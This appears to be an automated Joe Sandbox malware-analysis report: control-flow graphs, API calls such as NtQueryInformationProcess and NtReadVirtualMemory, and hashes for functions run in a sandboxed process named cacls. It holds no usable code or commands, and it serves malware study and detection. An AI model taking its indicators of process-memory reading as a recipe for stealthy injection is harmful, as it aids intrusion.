                                                                                                    Total number of Limit Nodes:2
                                                                                                    execution_graph 82399 2e22b20 82401 2e22b2a 82399->82401 82402 2e22b31 82401->82402 82403 2e22b3f LdrInitializeThunk 82401->82403 82410 2b71d58 82411 2b71db0 82410->82411 82412 2b71de4 82411->82412 82415 2b6ef68 82411->82415 82414 2b71dc1 82416 2b6ef8d 82415->82416 82417 2b6f0f7 NtQueryInformationProcess 82416->82417 82420 2b6f164 82416->82420 82418 2b6f131 82417->82418 82419 2b6f206 NtReadVirtualMemory 82418->82419 82418->82420 82419->82420 82420->82414 82421 2e229f0 LdrInitializeThunk

                                                                                                    Executed Functions

                                                                                                    Function 02B6EF5A Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 546nativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 2b6ef5a-2b6ef8b 1 2b6ef8d-2b6efa4 call 2b711a8 0->1 2 2b6efa9-2b6efc8 call 2b711c8 call 2b6cfe8 0->2 1->2 8 2b6f586-2b6f591 2->8 9 2b6efce-2b6f0ce call 2b6ee98 call 2b711c8 call 2b75134 call 2b60388 call 2b70788 call 2b60388 call 2b70788 call 2b72e98 2->9 26 2b6f0d4-2b6f162 call 2b60388 call 2b70788 NtQueryInformationProcess call 2b711c8 call 2b60388 call 2b70788 9->26 27 2b6f57a-2b6f581 call 2b6ee98 9->27 39 2b6f176-2b6f1ec call 2b75142 call 2b60388 call 2b70788 26->39 40 2b6f164-2b6f171 26->40 27->8 39->40 49 2b6f1f2-2b6f204 call 2b7516c 39->49 40->27 52 2b6f206-2b6f24f NtReadVirtualMemory call 2b71eb8 49->52 53 2b6f254-2b6f294 call 2b60388 call 2b70788 call 2b737f8 49->53 52->27 62 2b6f296-2b6f2ae 53->62 63 2b6f2b3-2b6f3a0 call 2b60388 call 2b70788 call 2b7517a call 2b60388 call 2b70788 call 2b731b8 call 2b71178 * 3 call 2b7516c 53->63 62->27 86 2b6f3a2-2b6f3d1 call 2b7516c call 2b71178 call 2b751ce call 2b75188 63->86 87 2b6f3d3-2b6f3eb call 2b7516c 63->87 99 2b6f42e-2b6f438 86->99 93 2b6f417-2b6f429 call 2b71df8 87->93 94 2b6f3ed-2b6f412 call 2b72968 87->94 93->99 94->93 100 2b6f4f7-2b6f55a call 2b60388 call 2b70788 call 2b73b18 99->100 101 2b6f43e-2b6f488 call 2b60388 call 2b70788 call 2b734d8 call 2b7516c 99->101 100->27 125 2b6f55c-2b6f571 100->125 120 2b6f4bd-2b6f4c5 call 2b7516c 101->120 121 2b6f48a-2b6f4b3 call 2b75218 call 2b751ce 101->121 120->100 129 2b6f4c7-2b6f4d2 120->129 121->120 125->27 128 2b6f575 call 2b711a8 125->128 128->27 129->100 131 2b6f4d4-2b6f4f2 call 2b73e38 129->131 131->100
                                                                                                    APIs
                                                                                                    • NtQueryInformationProcess.NTDLL ref: 02B6F116
                                                                                                    • NtReadVirtualMemory.NTDLL ref: 02B6F221
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528005609.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2b60000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                                    • String ID: 0$Hap)$R~?$\,
                                                                                                    • API String ID: 1498878907-730874448
                                                                                                    • Opcode ID: 9d652f501ab53b9f64308f5afdcd1f999590a23b56598b4defaa97360d58ae33
                                                                                                    • Instruction ID: 812a5626bfe13b3725900a4f878bf18e019a3fc0a2db9faa37d463c57a994e23
                                                                                                    • Opcode Fuzzy Hash: 9d652f501ab53b9f64308f5afdcd1f999590a23b56598b4defaa97360d58ae33
                                                                                                    • Instruction Fuzzy Hash: D2024974918A8C8FCBA5EF68C894AEE77E1FB98304F404A6AD85AD7640DF34D641CF41
                                                                                                    Function 02B6EF68 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 196nativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 134 2b6ef68-2b6ef8b 135 2b6ef8d-2b6efa4 call 2b711a8 134->135 136 2b6efa9-2b6efc8 call 2b711c8 call 2b6cfe8 134->136 135->136 142 2b6f586-2b6f591 136->142 143 2b6efce-2b6f0ce call 2b6ee98 call 2b711c8 call 2b75134 call 2b60388 call 2b70788 call 2b60388 call 2b70788 call 2b72e98 136->143 160 2b6f0d4-2b6f162 call 2b60388 call 2b70788 NtQueryInformationProcess call 2b711c8 call 2b60388 call 2b70788 143->160 161 2b6f57a-2b6f581 call 2b6ee98 143->161 173 2b6f176-2b6f1ec call 2b75142 call 2b60388 call 2b70788 160->173 174 2b6f164-2b6f171 160->174 161->142 173->174 183 2b6f1f2-2b6f204 call 2b7516c 173->183 174->161 186 2b6f206-2b6f24a NtReadVirtualMemory call 2b71eb8 183->186 187 2b6f254-2b6f294 call 2b60388 call 2b70788 call 2b737f8 183->187 191 2b6f24f 186->191 196 2b6f296-2b6f2ae 187->196 197 2b6f2b3-2b6f3a0 call 2b60388 call 2b70788 call 2b7517a call 2b60388 call 2b70788 call 2b731b8 call 2b71178 * 3 call 2b7516c 187->197 191->161 196->161 220 2b6f3a2-2b6f3d1 call 2b7516c call 2b71178 call 2b751ce call 2b75188 197->220 221 2b6f3d3-2b6f3eb call 2b7516c 197->221 233 2b6f42e-2b6f438 220->233 227 2b6f417-2b6f429 call 2b71df8 221->227 228 2b6f3ed-2b6f412 call 2b72968 221->228 227->233 228->227 234 2b6f4f7-2b6f55a call 2b60388 call 2b70788 call 2b73b18 233->234 235 2b6f43e-2b6f488 call 2b60388 call 2b70788 call 2b734d8 call 2b7516c 233->235 234->161 259 2b6f55c-2b6f571 234->259 254 2b6f4bd-2b6f4c5 call 2b7516c 235->254 255 2b6f48a-2b6f4b3 call 2b75218 call 2b751ce 235->255 254->234 263 2b6f4c7-2b6f4d2 254->263 255->254 259->161 262 2b6f575 call 2b711a8 259->262 262->161 263->234 265 2b6f4d4-2b6f4f2 call 2b73e38 263->265 265->234
                                                                                                    APIs
                                                                                                    • NtQueryInformationProcess.NTDLL ref: 02B6F116
                                                                                                    • NtReadVirtualMemory.NTDLL ref: 02B6F221
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528005609.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2b60000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                                    • String ID: 0$Hap)
                                                                                                    • API String ID: 1498878907-4223737749
                                                                                                    • Opcode ID: f08358fe799d6eaa7ed48a3b3352022d9b113fc33260f1e672661fc275259938
                                                                                                    • Instruction ID: 371e3c8946de53bcdba19b979d5bb5274eb72484057c1a05d70fc23b566dd9e1
                                                                                                    • Opcode Fuzzy Hash: f08358fe799d6eaa7ed48a3b3352022d9b113fc33260f1e672661fc275259938
                                                                                                    • Instruction Fuzzy Hash: 2E515D70918A8C8FDBA5EF68C8986EEBBE1FB98305F00466ED45ED7250DF3482458F41
                                                                                                    Function 02E22AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 275 2e22ac0-2e22acc LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 3d77ba32e386ff1928ebedd3b7c1ee5c79f3fca4be53f4c10eae27b7fb6627a3
                                                                                                    • Instruction ID: 5d39eb3aa902d8d5ecf720d7b731a1b04841abee4bf49f807ca482cb3e8b5e57
                                                                                                    • Opcode Fuzzy Hash: 3d77ba32e386ff1928ebedd3b7c1ee5c79f3fca4be53f4c10eae27b7fb6627a3
                                                                                                    • Instruction Fuzzy Hash: 6E90023164500802D551B1584519747001587D0302F91D416B0014654DC7758A55F6A1
                                                                                                    Function 02E22A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 274 2e22a80-2e22a8c LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: ca0e363f0041b2a829f6b4b5b8a89d1aed0202a12b7ebc88277509e29601f678
                                                                                                    • Instruction ID: 0fb336b50830a70fd76dc20ef2afe37e3a01266cebb3852fab1884ec49cff083
                                                                                                    • Opcode Fuzzy Hash: ca0e363f0041b2a829f6b4b5b8a89d1aed0202a12b7ebc88277509e29601f678
                                                                                                    • Instruction Fuzzy Hash: 71900261242000034506B1584519617401A87E0302B91D426F1004590DC5358891F125
                                                                                                    Function 02E22A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 273 2e22a10-2e22a1c LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 276f7bc928e435cf35fddc7cd5c00a86fc626f469d0f9bf30f03a065a99a9c53
                                                                                                    • Instruction ID: ef7331be88789440c98085d0c812f233d0d54191d764396bbe7cc90cf10dd56d
                                                                                                    • Opcode Fuzzy Hash: 276f7bc928e435cf35fddc7cd5c00a86fc626f469d0f9bf30f03a065a99a9c53
                                                                                                    • Instruction Fuzzy Hash: 5E900225261000020546E558070950B045597D63523D1D41AF1406590CC6318865E321
                                                                                                    Function 02E22BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 280 2e22bc0-2e22bcc LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: a5cd662d8f9d13a3a652178615f7ab407ba048f61f171acc9b9d0995cf24cb3d
                                                                                                    • Instruction ID: 83fe1e068c4efccee44caebbfaf9794f42aeaeede65c0b8304e6cc76172e7662
                                                                                                    • Opcode Fuzzy Hash: a5cd662d8f9d13a3a652178615f7ab407ba048f61f171acc9b9d0995cf24cb3d
                                                                                                    • Instruction Fuzzy Hash: F890023124100402D501A598550D647001587E0302F91E416B5014555EC6758891F131
                                                                                                    Function 02E22B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 278 2e22b80-2e22b8c LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: ac1ab72a967729d733826d7e4bc12304fdc43524a1705ca436832358fc71aade
                                                                                                    • Instruction ID: f9606ccb929b25459a75bc3895cf612e04bd32d185d5e96d71e7ecc61e0c740b
                                                                                                    • Opcode Fuzzy Hash: ac1ab72a967729d733826d7e4bc12304fdc43524a1705ca436832358fc71aade
                                                                                                    • Instruction Fuzzy Hash: 6190023124100842D501A1584509B47001587E0302F91D41BB0114654DC635C851F521
                                                                                                    Function 02E22B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 279 2e22b90-2e22b9c LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: fdfdf995bc2748cdba0f2d3db174ca2d57403ce8ed573174466e6971c03691bc
                                                                                                    • Instruction ID: 9f6689d9e09890b4875cfdc62b3c927f3de13d2fbe8807f8f386fa2ae93b7c12
                                                                                                    • Opcode Fuzzy Hash: fdfdf995bc2748cdba0f2d3db174ca2d57403ce8ed573174466e6971c03691bc
                                                                                                    • Instruction Fuzzy Hash: 7390023124108802D511A158850974B001587D0302F95D816B4414658DC6B58891F121
                                                                                                    Function 02E22B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 276 2e22b00-2e22b0c LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 93352118af6a8ce3157acee858fa306037a3c5dfa158db33d18fe5fde79b19e3
                                                                                                    • Instruction ID: 57268930ec8448bfe33c0b80177a8fab9d9730e7b75176653a732ef66b395aae
                                                                                                    • Opcode Fuzzy Hash: 93352118af6a8ce3157acee858fa306037a3c5dfa158db33d18fe5fde79b19e3
                                                                                                    • Instruction Fuzzy Hash: AE90023124504842D541B1584509A47002587D0306F91D416B0054694DD6358D55F661
                                                                                                    Function 02E22B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 277 2e22b10-2e22b1c LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 3b682af15060c6496f74c8fc3dffbd865b5c1e39a920ee701d6843d545b5ec74
                                                                                                    • Instruction ID: 10a68a5455e79bb1837d89073de53d74f4fe994e1ab8068880431963e55ed331
                                                                                                    • Opcode Fuzzy Hash: 3b682af15060c6496f74c8fc3dffbd865b5c1e39a920ee701d6843d545b5ec74
                                                                                                    • Instruction Fuzzy Hash: F790023124100802D581B158450964B001587D1302FD1D41AB0015654DCA358A59F7A1
                                                                                                    Function 02E229F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 272 2e229f0-2e229fc LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 01e72c98c69284856aa4909f5d2fe9e35ce3efc320c8bbe2769ba1b15d5d850f
                                                                                                    • Instruction ID: 6a0ffdec75b438a7c8232481c21a659817875c15847eae03a0246cfbbc0f3f28
                                                                                                    • Opcode Fuzzy Hash: 01e72c98c69284856aa4909f5d2fe9e35ce3efc320c8bbe2769ba1b15d5d850f
                                                                                                    • Instruction Fuzzy Hash: D4900225251000030506E5580709507005687D5352391D426F1005550CD6318861E121
                                                                                                    Function 02E22E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 47fb9b89b24a3f2a2a1682dd31e85337ec7194361a3ec047261fe4bc4358af69
                                                                                                    • Instruction ID: 97b0492e7307968b0dd3ae0b91dc3a0d9a799904970f1d11f510612c67229a24
                                                                                                    • Opcode Fuzzy Hash: 47fb9b89b24a3f2a2a1682dd31e85337ec7194361a3ec047261fe4bc4358af69
                                                                                                    • Instruction Fuzzy Hash: A690026138100442D501A1584519B070015C7E1302F91D41AF1054554DC639CC52F126
                                                                                                    Function 02E22F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 2bb23b0149b6bd89b1832e5a0588c8040044ead41f0fe815e1dc8b0328ca4901
                                                                                                    • Instruction ID: 3d80ab1a1810b643e6f1f5a1c6b2615dafd35d98b256d3e3ff48a70c15aa027c
                                                                                                    • Opcode Fuzzy Hash: 2bb23b0149b6bd89b1832e5a0588c8040044ead41f0fe815e1dc8b0328ca4901
                                                                                                    • Instruction Fuzzy Hash: 9790022125180042D601A5684D19B07001587D0303F91D51AB0144554CC9358861E521
                                                                                                    Function 02E22CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 282 2e22cf0-2e22cfc LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 0891d5f0862bbb56aba0b03c972fdcdc82665abe19f3c85afc5040beb32c1b47
                                                                                                    • Instruction ID: 4394619db05cbd71fc44bd89670f9b90738aa97c628435108d7b45e2b4dcb993
                                                                                                    • Opcode Fuzzy Hash: 0891d5f0862bbb56aba0b03c972fdcdc82665abe19f3c85afc5040beb32c1b47
                                                                                                    • Instruction Fuzzy Hash: 40900221282041525946F1584509507401697E03427D1D417B1404950CC5369856E621
                                                                                                    Function 02E22C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 281 2e22c30-2e22c3c LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 82919e32b0bbcd0765d1a26856ea913559c81f1f5e1677c79529266c2bf042c6
                                                                                                    • Instruction ID: eba588d6e600f1d76b71bea211f06c11e7794ad9a005b33530720b7e13c6670f
                                                                                                    • Opcode Fuzzy Hash: 82919e32b0bbcd0765d1a26856ea913559c81f1f5e1677c79529266c2bf042c6
                                                                                                    • Instruction Fuzzy Hash: BD90022925300002D581B158550D60B001587D1303FD1E81AB0005558CC9358869E321
                                                                                                    Function 02E22D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 283 2e22d10-2e22d1c LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 9f8444d19fdf086fb3b1e11ed12a6184bd7b202ad54e7a4b233261c835868e94
                                                                                                    • Instruction ID: da4bd3fdeacfa7c950e5d10917fd4ac8400f3e9f28cdde059060612a15d469b3
                                                                                                    • Opcode Fuzzy Hash: 9f8444d19fdf086fb3b1e11ed12a6184bd7b202ad54e7a4b233261c835868e94
                                                                                                    • Instruction Fuzzy Hash: F490023124100413D512A1584609707001987D0342FD1D817B0414558DD6768952F121
                                                                                                    Function 02E234E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: bdf41cfcf5bb8f23430ff0250d2fd9cf15e42444c474532c7739e9c48f80f4ea
                                                                                                    • Instruction ID: 7040819b6c20d5431c3952a03b31b4dca091355cc29229efbca86900d3d90edd
                                                                                                    • Opcode Fuzzy Hash: bdf41cfcf5bb8f23430ff0250d2fd9cf15e42444c474532c7739e9c48f80f4ea
                                                                                                    • Instruction Fuzzy Hash: 4790023164510402D501A1584619707101587D0302FA1D816B0414568DC7B58951F5A2
                                                                                                    Function 02E22B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 268 2e22b2a-2e22b2f 269 2e22b31-2e22b38 268->269 270 2e22b3f-2e22b46 LdrInitializeThunk 268->270
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
